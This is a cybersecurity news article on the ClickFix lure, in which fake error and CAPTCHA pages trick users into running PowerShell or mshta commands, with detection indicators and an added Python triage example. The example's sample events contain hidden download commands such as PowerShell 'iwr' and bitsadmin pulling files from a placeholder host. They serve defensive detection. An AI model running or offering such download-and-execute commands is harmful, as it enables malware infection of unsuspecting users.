A new social engineering tactic, known as ClickFix, has emerged, using deceptive error messages to prompt users to run harmful code.
The Sekoia Threat Detection & Research (TDR) team has recently detailed this tactic – first discovered by Proofpoint in March – in a new report published earlier today. This approach, called ClearFake, encourages users to copy and execute malicious PowerShell commands, enabling cybercriminals to infect users’ devices.
ClickFix exploits fake error messages across multiple platforms, such as Google Meet and Zoom, often mimicking error notifications on video conferencing pages to lure users.
When users attempt to troubleshoot the “error,” they inadvertently initiate a series of commands, downloading malware onto their device. Beyond video platforms, ClickFix has been found using fake CAPTCHA pages that urge users to complete steps that activate malicious code, causing infections on both Windows and macOS systems.
Different Infection Chains for Windows and macOS
ClickFix adapts its tactics to different operating systems, leveraging the unique behaviors of each. On macOS, for instance, users who click on a “fix it” prompt are guided through steps that initiate an automatic download and installation of malware in .dmg format.
On Windows, ClickFix relies on either a malicious mshta or PowerShell command, depending on the infection cluster being used. The mshta-based infections use a VBScript embedded in an HTML application, while PowerShell commands run directly from the user’s input.
These Windows infections often masquerade as troubleshooting actions and are specifically designed to appear as if they’re coming from the legitimate Explorer.exe process, making the malware difficult to detect.
ClickFix also uses GitHub and suspicious websites, where users often encounter redirection chains that lead them to fake CAPTCHAs. These deceptive pages use a simple PowerShell script that’s hard to detect but impactful.
Detection and Prevention Techniques
Detecting ClickFix requires specialized tools. The TDR team suggests monitoring for:
- PowerShell and bitsadmin processes, with mshta.exe as the parent process
- Command lines containing URLs, which may indicate a malicious download
- Network activities involving PowerShell connections to low-prevalence or suspicious domains
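The three indicators above, turned into a small triage routine over process-creation events. This is an added example, not Sekoia's detection rules or code: the sample events, the hostnames and the domain-prevalence table are constructed placeholders, and the prevalence check is applied to hosts pulled from the command line as a stand-in for network telemetry.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c iwr http://example.invalid/p.ps1"},
    {"parent": "mshta.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job http://example.invalid/a.exe C:\\Users\\Public\\a.exe"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": "cmd.exe", "image": "curl.exe",
     "cmdline": "curl.exe https://updates.example.org/update.json -o update.json"},
]

# Constructed prevalence table: number of fleet endpoints seen contacting each
# domain (stand-in for a threat-intel or prevalence feed).
DOMAIN_PREVALENCE = {"example.invalid": 1, "updates.example.org": 950}
LOW_PREVALENCE_MAX = 5  # a domain seen on this many hosts or fewer is "low prevalence"

URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
DOWNLOADERS = {"powershell.exe", "pwsh.exe", "bitsadmin.exe"}


def classify(event):
    """Return the names of the indicators an event matches, in a fixed order."""
    hits = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    # Indicator 1: PowerShell/bitsadmin spawned by mshta.exe
    if image in DOWNLOADERS and parent == "mshta.exe":
        hits.append("mshta_parent_of_downloader")
    # Indicator 2: a URL embedded in the command line
    match = URL_RE.search(event["cmdline"])
    if match:
        hits.append("url_in_cmdline")
        # Indicator 3: the contacted host is rarely seen across the fleet
        host = urlsplit(match.group(0)).hostname or ""
        if DOMAIN_PREVALENCE.get(host.lower(), 0) <= LOW_PREVALENCE_MAX:
            hits.append("low_prevalence_domain")
    return hits


def triage(events):
    """Return (event, hits) pairs for every event matching at least one indicator."""
    return [(e, h) for e in events if (h := classify(e))]


if __name__ == "__main__":
    for event, hits in triage(SAMPLE_EVENTS):
        print(event["image"], "<-", event["parent"], hits)
```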
“Combining these detection techniques with threat intelligence strengthens defense mechanisms against these sophisticated social engineering techniques,” Sekoia said.
“As this technique is evolving, [we] will continue to track this delivery infrastructure and develop our detection capabilities to mitigate the risks associated with this threat.”